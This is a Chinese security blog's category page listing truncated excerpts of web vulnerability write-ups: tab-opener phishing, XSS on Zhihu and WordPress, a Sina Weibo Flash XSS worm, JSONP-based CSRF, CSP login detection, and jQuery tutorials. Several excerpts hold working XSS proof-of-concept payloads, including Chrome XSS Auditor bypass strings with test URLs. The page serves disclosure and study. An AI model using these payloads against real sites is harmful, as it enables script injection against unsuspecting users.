神奇的opener对象

作者: 分类: web前端 时间: 2016-8-30 0:32 评论: 3条评论 浏览: 2502人看过 标签: opener

    看到微博上coding发了一个文章,https://coding.net/u/tvvocold/pp/125176 ,这个玩法比较老了,但可能还是有不少人不知道。大概一年前,在某个曾经很火的白帽子社区,有个白帽子的签名是他的博客,点击浏览完毕以后返回该社区,就会发现:咦,我已经退出登录了?于是重新输入账号、密码登录,成功被钓鱼。该白帽子通过这个方法,应该成功钓到了好几个其他白帽子的密码。(缅怀一下,很多该社区分享的东西,外面不科(chao)普(zuo)根本不知道,说起来很可笑)

    效果类似这个:http://naotu.baidu.com/file/b8a9e8886e91624dfe6bb6f3e2130bda?token=143a14685143a021 ,你在该站中点击我的博客:

    sp160830_012931.png

    成功打开了drops.leavesongs.com。此时留心的话,已经可以看到原标签发生了变化:

    sp160830_013040.png

    转回去看看,变...

阅读全文>>

知乎某处XSS+刷粉超详细漏洞技术分析

作者: 分类: web前端 时间: 2016-4-17 15:13 评论: 8条评论 浏览: 4151人看过 标签: xss CSRF漏洞 知乎

我觉得十分经典的一个漏洞,和大家分享一下~

好久没法前端漏洞分析了,这次来一个。

老问题导致的XSS漏洞

首先看一个XSS漏洞,这个点是老问题了, http://www.wooyun.org/bugs/wooyun-2016-0171240
知乎按照洞主提供的方法进行修复了,但明显是不行的。我们看到 https://link.zhihu.com/?target=http://www.baidu.com 这个链接的源码:

14566414207565.jpg

将输入的信息传入URI参数,解码以后赋值与location.href。明显可以利用JavaScript:伪协议执行js代码。

如下: https://link.zhihu.com/?target=javascript:alert(1)

14566415103785.jpg


如何利用这个漏洞,有如下办法:

  1. 获取用户Cookie
  2. 刷粉、蠕虫等

但经过分析,这两种利用办法都无法直接达到。首先,因为知乎重要cookie加了httponly,所以打不到用户cookie;另外,因为知乎的主站是www.zhihu.com,而xss处于子域l...

阅读全文>>

浏览器安全一 / Chrome XSS Auditor bypass

作者: 分类: web前端 时间: 2016-1-16 1:18 评论: 2条评论 浏览: 5427人看过 标签: 浏览器 fliter

私藏比较久的干货,严禁转载。

(2017-01-04 更新)

Bypass 3 via flash

只要支持flash的chrome版本(最新版Chrome 5),均可使用。
context == support flash

<object allowscriptaccess=always> <param name=url value=http://mhz.pw/game/xss/alert.swf> 

test

http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http://mhz.pw/game/xss/alert.swf%3E


Universal Bypass 2

最新版(Chrome 55/56)无任何条件,只要输出在页面中即可执行代码。
context == null

?xss=<svg><set href=#script attributeName=href to=data:,alert(document.domain) /><script id=script src=foo></script> 

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href=%23script%20attributeName=href%20to=data:,alert(document.domain)%20/%3E%3Cscript%20id=script%20src=foo%3E%3C/script%3E

阅读全文>>

分享一个jsonp劫持造成的新浪某社区CSRF蠕虫

作者: 分类: web前端 时间: 2015-6-20 15:19 评论: 8条评论 浏览: 5304人看过 标签: CSRF漏洞 jsonp

    最近jsonp很火,实话说已经是被玩烂了的,只是一直没有受到大家的重视。正好在上个月,我挖过一个由于jsonp造成的新浪某社区CSRF,当时是为了准备一篇文章,之后这篇文章也会拿出来分享。

    因为新浪已经修复了问题,所以我先把这个漏洞分享出来。以下是当时写的部分文章。

    

0x01 引子

    听说新浪五月送衣服,我其实也没太多空去挖洞。本来想交一个两年前挖的CSRF刷粉,结果拿出来一看那洞早没了,目标站都换了。

    详细说,就是我那个洞被302跳转到新浪股吧(http://guba.sina.com.cn/)去了。

    最近股市很火啊,多少人在股市里发家致富。于是我简单开着burpsuite在股吧里转了一圈,发现了一处有意思的CSRF。

    新浪...

阅读全文>>

Wordpress < 4.1.2 存储型XSS分析与稳定POC

作者: 分类: web前端 时间: 2015-4-27 22:59 评论: 9条评论 浏览: 13404人看过 标签: 富文本 xss

    Wordpress这个XSS实际上是很好用的,匿名用户即可发表并触发,这里给出简单的分析与稳定的好触发的POC。

    其实漏洞的作者已经在文章(https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/)里说明了,但文章给的Payload不知道为何在我的测试wp中不能触发。

    这个漏洞的原理很有意思,由MYSQL的一个特性导致,当我们将一个4字节的UTF8字符插入mysql时,mysql将会视之为utf8mb4编码,当将utf8mb4编码的字符插入到UTF8编码的列中,在非strict mode下就会造成一个截断。

    截断的话,就能绕过很多富文本过滤器了。比如,插入两个评论“<img src=1”,和“onerror=alert(1)// ”,这二者都不会触发某些富文本过滤器(因为前者并不含有白名单外的属性,后者并不是一个标签),但两个评论如果存在于同一个...

阅读全文>>

从新浪微博一处Flash XSS到XSS Worm

作者: 分类: web前端 时间: 2015-1-8 0:23 评论: 5条评论 浏览: 11605人看过 标签: flashxss xss蠕虫

    这是我之前提交到新浪应急响应中心的漏洞,因为我看到新浪已经修复了,所以发出来。

    最近一直在研究一些flash,希望能发现点什么。

    偶然发现这样一个swf:http://vgirl.weibo.com/swf/BlogUp.swf (已修复),一般上传swf、播放器这种地方容易出现xss,这个BlogUp.swf就是上传的flash。

    反编译看看,其中有个函数:

        private function init(Number:flash.events::Event = null)
        {
            // debugfile: F:\flash\blogUp_Vgirl\src;;xblogUploadImage.as
            stage.scaleMode = StageScaleMode.NO_SCALE;
 ...

阅读全文>>

利用CSP探测网站登陆状态(支付宝/百度为例)

作者: 分类: web前端 时间: 2015-1-4 15:55 评论: 2条评论 浏览: 3413人看过 标签: CSP

    收假啦,收假啦,一篇文首发drops:http://drops.wooyun.org/tips/4482

    今天看到zone里有同学发帖说了探测支付宝登录状态的帖子:http://zone.wooyun.org/content/17665

    由此我想到了我们parsec的@/fd 半年前提到的一个思路,当时他给出了一个探测twitter是否登录的页面,可是我那个时候才疏学浅,好像一直没理解。这时候返回去看看,就有了这篇文章。

    
0x01 CSP简介

    内容安全策略(Content Security Policy,简称CSP)是一种以可信白名单作机制,来限制网站中是否可以包含某来源内容。默认配置下不允许执行内联代码(<script>块内容,内联事件,内联样式),以及禁止执行eval() , newFunction() , setTimeout([string], …) 和setInterval([string], …) 。

    CSP更详尽的介绍可以在drops看到:http://drops.wooyun.org/tips/1439


0x02 大环境介绍与原理

    简单了解一下CSP,我们知道CSP可以限制网站中可否包含某来源的内容。同时,csp还可以在页面违反规则的时候发送一个数据包,将具体细节通知给服务端……

阅读全文>>

Fuzz中的javascript大小写特性

作者: 分类: web前端 时间: 2014-9-21 1:28 评论: 3条评论 浏览: 3368人看过 标签: javascript

    某比赛实在有点坑人,题目涉嫌抄袭不说,还不停改来改去。算了不吐槽了,说一则javascript小特性吧。

    toUpperCase()是javascript中将小写转换成大写的函数。toLowerCase()是javascript中将大写转换成小写的题目。但是这俩函数真的只有这两个功能么?

    不如我们来fuzz一下,看看toUpperCase功能如何?

if (!String.fromCodePoint) {
	(function() {
		var defineProperty = (function() {
			// IE 8 only supports `Object.defineProperty` on DOM elements
			try {
				var object = {};
				var $defineProperty = Object.defineProperty;
				var result = $defineProperty(objec...


阅读全文>>

用Jquery做一个进度条

作者: 分类: web前端 时间: 2013-8-24 20:45 评论: 11条评论 浏览: 14703人看过 标签: Jquery 进度条

    本来打算写一个Jquery插件的,不过我看了看网上插件的教程,感觉都不怎么样。国外有一本书叫《jQuery Plugin Development Beginner’s Guide》,写的不错(作者之一是一位复旦毕业的华裔,所以可能语言和思维方式我们更好理解)。没有中文版。就我英语水平来估计,要看一个月……只能慢慢来了。

    为什么我...

阅读全文>>

JQuery 入门学习(完结)

作者: 分类: web前端 时间: 2013-8-15 13:30 评论: 5条评论 浏览: 3796人看过 标签: Jquery

    伴随着我的假期即将完结的时间,这几篇Jquery文档也算带领大家熟悉了Jquery的代码编写。最后一篇是对Jquery的实际应用,以及一些平时我注意到的细节。最后对Jquery进行总结。

    一个鼠标移动上去就变换颜色的表格


<html>
<head>
<title>表格1</title>...

阅读全文>>

Top ↑ sitemap More